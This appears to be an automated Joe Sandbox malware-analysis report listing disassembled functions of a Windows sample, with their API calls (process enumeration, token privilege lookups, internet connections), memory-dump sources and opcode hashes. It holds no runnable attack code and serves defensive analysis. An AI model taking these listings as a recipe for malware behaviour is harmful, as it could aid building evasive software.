                                                                          • Instruction Fuzzy Hash: 8231CF30600246BFDF238F64CC46BAA7BE9FF42310F164829E8249F1A1D771E950DB92
                                                                          Function 00394EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetForegroundWindow.USER32 ref: 00394F02
                                                                            • Part of subcall function 00373641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0037365B
                                                                            • Part of subcall function 00373641: GetCurrentThreadId.KERNEL32 ref: 00373662
                                                                            • Part of subcall function 00373641: AttachThreadInput.USER32(00000000,?,00375005), ref: 00373669
                                                                          • GetCaretPos.USER32(?), ref: 00394F13
                                                                          • ClientToScreen.USER32(00000000,?), ref: 00394F4E
                                                                          • GetForegroundWindow.USER32 ref: 00394F54
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                          • String ID:
                                                                          • API String ID: 2759813231-0
                                                                          • Opcode ID: fec4a1d7036653e28c3e69573e96609a8ce696dc2e9ff7fbe32706ea7a06f880
                                                                          • Instruction ID: 6a9b62f2b059aac6643c9e045026974ddfb77e0b8696c36da4f0021a6180835c
                                                                          • Opcode Fuzzy Hash: fec4a1d7036653e28c3e69573e96609a8ce696dc2e9ff7fbe32706ea7a06f880
                                                                          • Instruction Fuzzy Hash: 6D310D71D00108AFDB15EFA5C885AEFB7FDEF99300F10446AE415E7241DA759E45CBA0
                                                                          Function 00373C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00373C7A
                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00373C88
                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00373CA8
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00373D52
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                          • String ID:
                                                                          • API String ID: 420147892-0
                                                                          • Opcode ID: 735181459341362e17f88989274754ad174516f994bece9c8e64e9d8ff998bcd
                                                                          • Instruction ID: e2746106202a8b0bab35c001770a9306707688ecafca71fd31152abe1d6cb1a4
                                                                          • Opcode Fuzzy Hash: 735181459341362e17f88989274754ad174516f994bece9c8e64e9d8ff998bcd
                                                                          • Instruction Fuzzy Hash: B33181311083059FD326EF50C881AAABBE8EF99354F54482DF485CA1A1EB759A49CB92
                                                                          Function 0039C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00312612: GetWindowLongW.USER32(?,000000EB), ref: 00312623
                                                                          • GetCursorPos.USER32(?), ref: 0039C4D2
                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0034B9AB,?,?,?,?,?), ref: 0039C4E7
                                                                          • GetCursorPos.USER32(?), ref: 0039C534
                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0034B9AB,?,?,?), ref: 0039C56E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                          • String ID:
                                                                          • API String ID: 2864067406-0
                                                                          • Opcode ID: 1824991a2a8d55d746c7b464a2962f1362366026d6262f104ee147544d286098
                                                                          • Instruction ID: b285e351bdf3269143596cddd1606ac25077d17531302b8c46ac44c6ae85b747
                                                                          • Opcode Fuzzy Hash: 1824991a2a8d55d746c7b464a2962f1362366026d6262f104ee147544d286098
                                                                          • Instruction Fuzzy Hash: C931A235610058AFCF17CF59C858EEA7BB9EB0A310F46406AF9058B262C731AD50DBA4
                                                                          Function 00368656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0036810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00368121
                                                                            • Part of subcall function 0036810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0036812B
                                                                            • Part of subcall function 0036810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0036813A
                                                                            • Part of subcall function 0036810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00368141
                                                                            • Part of subcall function 0036810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00368157
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003686A3
                                                                          • _memcmp.LIBCMT ref: 003686C6
                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003686FC
                                                                          • HeapFree.KERNEL32(00000000), ref: 00368703
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                          • String ID:
                                                                          • API String ID: 1592001646-0
                                                                          • Opcode ID: 626f561bdacacfb82ef6680dd819a6dbb133ae1ea2cf9073c41cff70be3e0f16
                                                                          • Instruction ID: 8945744a5ccd1329e7f06467b19c1b45d89bcd27f80eca85db68155c8816c3c5
                                                                          • Opcode Fuzzy Hash: 626f561bdacacfb82ef6680dd819a6dbb133ae1ea2cf9073c41cff70be3e0f16
                                                                          • Instruction Fuzzy Hash: 32219D71E00109EFDB11DFA8C949BEEB7B9EF48305F158159E544AB244DB71AE05CB90
                                                                          Function 0033098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __setmode.LIBCMT ref: 003309AE
                                                                            • Part of subcall function 00315A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00377896,?,?,00000000), ref: 00315A2C
                                                                            • Part of subcall function 00315A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00377896,?,?,00000000,?,?), ref: 00315A50
                                                                          • _fprintf.LIBCMT ref: 003309E5
                                                                          • OutputDebugStringW.KERNEL32(?), ref: 00365DBB
                                                                            • Part of subcall function 00334AAA: _flsall.LIBCMT ref: 00334AC3
                                                                          • __setmode.LIBCMT ref: 00330A1A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                          • String ID:
                                                                          • API String ID: 521402451-0
                                                                          • Opcode ID: 4fad25b4921f79cfcde3445ffe4dc0f7be15c48d147048a3696cc2a86ec932e1
                                                                          • Instruction ID: 5fc57b94d551f6ca8c01c6c919a922dfa10b623ddf12b2e2daec181d92314cf9
                                                                          • Opcode Fuzzy Hash: 4fad25b4921f79cfcde3445ffe4dc0f7be15c48d147048a3696cc2a86ec932e1
                                                                          • Instruction Fuzzy Hash: 9E1127319042446FDB0BB7B4ACC79FE776C9F86320F144116F1059E192EF21598647A1
                                                                          Function 00381767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003817A3
                                                                            • Part of subcall function 0038182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0038184C
                                                                            • Part of subcall function 0038182D: InternetCloseHandle.WININET(00000000), ref: 003818E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$CloseConnectHandleOpen
                                                                          • String ID:
                                                                          • API String ID: 1463438336-0
                                                                          • Opcode ID: 118aa4d9b4ae6d280f8b7a68e057cb64a3dbc9ef22e57f2a7be580921d9d2cc1
                                                                          • Instruction ID: 6f37a94eecfb30a02117a189900ad261d25d26f35b01523af98fbbbfb3e59f7c
                                                                          • Opcode Fuzzy Hash: 118aa4d9b4ae6d280f8b7a68e057cb64a3dbc9ef22e57f2a7be580921d9d2cc1
                                                                          • Instruction Fuzzy Hash: 54215E35200705BFEB13AF60DC41BBABBADFB48711F10416AFA5596650DB7298129BA0
                                                                          Function 00373A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesW.KERNEL32(?,0039FAC0), ref: 00373A64
                                                                          • GetLastError.KERNEL32 ref: 00373A73
                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00373A82
                                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0039FAC0), ref: 00373ADF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 2267087916-0
                                                                          • Opcode ID: 85e48381f783fd11453598bfb1f375f641a38cfd043499a6a354b8d5e0d7add5
                                                                          • Instruction ID: 5dd6b5002706f445370401e609f923296c8614143001ae4ebb4b29a6a25b1f74
                                                                          • Opcode Fuzzy Hash: 85e48381f783fd11453598bfb1f375f641a38cfd043499a6a354b8d5e0d7add5
                                                                          • Instruction Fuzzy Hash: D221A334508206DF8725DF28C8828AA77E8EF59364F148A2EF4DDC72A1D735DE45DB82
                                                                          Function 0036DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0036F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0036DCD3,?,?,?,0036EAC6,00000000,000000EF,00000119,?,?), ref: 0036F0CB
                                                                            • Part of subcall function 0036F0BC: lstrcpyW.KERNEL32(00000000,?,?,0036DCD3,?,?,?,0036EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0036F0F1
                                                                            • Part of subcall function 0036F0BC: lstrcmpiW.KERNEL32(00000000,?,0036DCD3,?,?,?,0036EAC6,00000000,000000EF,00000119,?,?), ref: 0036F122
                                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0036EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0036DCEC
                                                                          • lstrcpyW.KERNEL32(00000000,?,?,0036EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0036DD12
                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,0036EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0036DD46
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                          • String ID: cdecl
                                                                          • API String ID: 4031866154-3896280584
                                                                          • Opcode ID: 8b6ec8236c4280ed920e4049b37b488e8a01995007b652d6e1e38713a5a9f13f
                                                                          • Instruction ID: e67f36836b223d9a0ffbbc72fa531d38dcd6a8d3d1e249975dc4158b7a2bccf8
                                                                          • Opcode Fuzzy Hash: 8b6ec8236c4280ed920e4049b37b488e8a01995007b652d6e1e38713a5a9f13f
                                                                          • Instruction Fuzzy Hash: 53118E3A200305EFCB26AF74D845D7A77A9FF46350F41812AE906CB2A4EB729851C7D5
                                                                          Function 003450E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00345101
                                                                            • Part of subcall function 0033571C: __FF_MSGBANNER.LIBCMT ref: 00335733
                                                                            • Part of subcall function 0033571C: __NMSG_WRITE.LIBCMT ref: 0033573A
                                                                            • Part of subcall function 0033571C: RtlAllocateHeap.NTDLL(01130000,00000000,00000001,00000000,?,?,?,00330DD3,?), ref: 0033575F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap_free
                                                                          • String ID:
                                                                          • API String ID: 614378929-0
                                                                          • Opcode ID: 439676252e1dbf625726188683c0dcfc4b1ddc0d4b5b58b33d25261e43e8de21
                                                                          • Instruction ID: bc76e11e0f6cce5a84b3ccfc8267af8f10af31553ff930725ab10a339d854286
                                                                          • Opcode Fuzzy Hash: 439676252e1dbf625726188683c0dcfc4b1ddc0d4b5b58b33d25261e43e8de21
                                                                          • Instruction Fuzzy Hash: 0411A072D01A16AFCF232F74AC85B6E77DC9B043A1F21492AF9459E252DE7499408690
                                                                          Function 003144A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 003144CF
                                                                            • Part of subcall function 0031407C: _memset.LIBCMT ref: 003140FC
                                                                            • Part of subcall function 0031407C: _wcscpy.LIBCMT ref: 00314150
                                                                            • Part of subcall function 0031407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00314160
                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 00314524
                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00314533
                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0034D4B9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 1378193009-0
                                                                          • Opcode ID: 7831c0d6ab6c54c9f5c3415c3d7d91cce6716622c22049d5f370a2c6fe685d5f
                                                                          • Instruction ID: 9959559fe596bfe33d78cf2dcd7d1917fbf6be4982af0f21ed98437d51eba1cb
                                                                          • Opcode Fuzzy Hash: 7831c0d6ab6c54c9f5c3415c3d7d91cce6716622c22049d5f370a2c6fe685d5f
                                                                          • Instruction Fuzzy Hash: 4D2107705047849FE7338B259845BE7BBEC9F0A304F04009EE69E9A281C7742984CB41
                                                                          Function 00386369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00315A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00377896,?,?,00000000), ref: 00315A2C
                                                                            • Part of subcall function 00315A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00377896,?,?,00000000,?,?), ref: 00315A50
                                                                          • gethostbyname.WSOCK32(?,?,?), ref: 00386399
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003863A4
                                                                          • _memmove.LIBCMT ref: 003863D1
                                                                          • inet_ntoa.WSOCK32(?), ref: 003863DC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                          • String ID:
                                                                          • API String ID: 1504782959-0
                                                                          • Opcode ID: 3b6de1db72db1964ac3b524e8e769284d39f4984ea2307cb044f410ecabdf31a
                                                                          • Instruction ID: ce5f20c3e5ce29f7b55fd7c9c9f5b26be273bebf36686d919a444629f667e413
                                                                          • Opcode Fuzzy Hash: 3b6de1db72db1964ac3b524e8e769284d39f4984ea2307cb044f410ecabdf31a
                                                                          • Instruction Fuzzy Hash: F5114C32600109AFCB06FBA4D996DEEB7BDAF48310B144065F506EB161DB31AE54CB61
                                                                          Function 00368B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00368B61
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00368B73
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00368B89
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00368BA4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: d5047a9648ac42bf9edce492d9586d7c9cbc087e0aaf23158afc5c19edcedc0e
                                                                          • Instruction ID: d2ec70323baaf93575024a11ecdc0ff3d244239c4bc405c03da1b23fb18d5a10
                                                                          • Opcode Fuzzy Hash: d5047a9648ac42bf9edce492d9586d7c9cbc087e0aaf23158afc5c19edcedc0e
                                                                          • Instruction Fuzzy Hash: FD114879900218FFEB11DFA5CC84FADBBB8FB48310F2041A5EA00B7294DA716E11DB94
                                                                          Function 00311290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00312612: GetWindowLongW.USER32(?,000000EB), ref: 00312623
                                                                          • DefDlgProcW.USER32(?,00000020,?), ref: 003112D8
                                                                          • GetClientRect.USER32(?,?), ref: 0034B5FB
                                                                          • GetCursorPos.USER32(?), ref: 0034B605
                                                                          • ScreenToClient.USER32(?,?), ref: 0034B610
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 4127811313-0
                                                                          • Opcode ID: 687e85d8d5c0533cc14ab84bd80c651d0f7f4ab47123f3ff2d20f5c1d9cf0faf
                                                                          • Instruction ID: 283b1a96a58b44a2563b81407254305a9f7d07b821f09a76c7bfc39ac28189a0
                                                                          • Opcode Fuzzy Hash: 687e85d8d5c0533cc14ab84bd80c651d0f7f4ab47123f3ff2d20f5c1d9cf0faf
                                                                          • Instruction Fuzzy Hash: A2113A35601119EFCF16EF98D8859EE77B8EB0A301F500856FA41E7240C735BA929BA5
                                                                          Function 0036D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0036D84D
                                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0036D864
                                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0036D879
                                                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0036D897
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                                          • String ID:
                                                                          • API String ID: 1352324309-0
                                                                          • Opcode ID: d1eb55f4e3508059701220c97caa69193f269bfbda721c11557e1dec88fc16ab
                                                                          • Instruction ID: 846908dcc29ae18c5a0a8bf09d578065de17a66a89dbce2183d3bfcadf6bf924
